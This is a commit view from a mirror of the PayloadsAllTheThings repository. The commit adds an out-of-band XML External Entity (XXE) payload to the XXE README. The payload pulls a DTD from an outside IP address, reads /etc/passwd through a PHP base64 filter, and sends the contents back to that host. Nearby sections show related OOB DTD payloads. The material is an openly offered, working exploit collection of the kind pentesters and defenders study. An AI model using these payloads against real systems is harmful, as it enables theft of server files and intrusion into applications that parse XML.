ch0ic3/PayloadsAllTheThings
1
0
Fork 0
mirror of https://github.com/swisskyrepo/PayloadsAllTheThings.git synced 2025-02-21 14:16:07 +00:00
Code Issues Actions Packages Projects Releases Wiki Activity

XXE via DTD and PHP Filter

Browse Source
This commit is contained in:
Swissky 2017-06-28 21:43:30 +02:00
parent 43f8367df0
commit 240e46e1e1
1 changed files with 18 additions and 3 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

21
XXE injections/README.md
View File

@ -1,5 +1,5 @@
# XML External Entity # XML External Entity
An XML External Entity attack is a type of attack against an application that parses XML input An XML External Entity attack is a type of attack against an application that parses XML input
## Exploit ## Exploit
@ -39,7 +39,7 @@ PHP Wrapper inside XXE
<zipcode>75000</zipcode> <zipcode>75000</zipcode>
<city>Paris</city> <city>Paris</city>
</contact> </contact>
</contacts> </contacts>
``` ```
@ -80,7 +80,22 @@ File stored on http://publicServer.com/parameterEntity_oob.dtd
%all; %all;
``` ```
XXE OOB with DTD and PHP filter
```
<?xml version="1.0" ?>
<!DOCTYPE r [
<!ELEMENT r ANY >
<!ENTITY % sp SYSTEM "http://92.222.81.2/dtd.xml">
%sp;
%param1;
]>
<r>&exfil;</r>
File stored on http://92.222.81.2/dtd.xml
<!ENTITY % data SYSTEM "php://filter/convert.base64-encode/resource=/etc/passwd">
<!ENTITY % param1 "<!ENTITY exfil SYSTEM 'http://92.222.81.2/dtd.xml?%data;'>">
```
## Thanks to ## Thanks to
* https://www.owasp.org/index.php/XML_External_Entity_(XXE)_Processing * https://www.owasp.org/index.php/XML_External_Entity_(XXE)_Processing
* http://web-in-security.blogspot.fr/2014/11/detecting-and-exploiting-xxe-in-saml.html * http://web-in-security.blogspot.fr/2014/11/detecting-and-exploiting-xxe-in-saml.html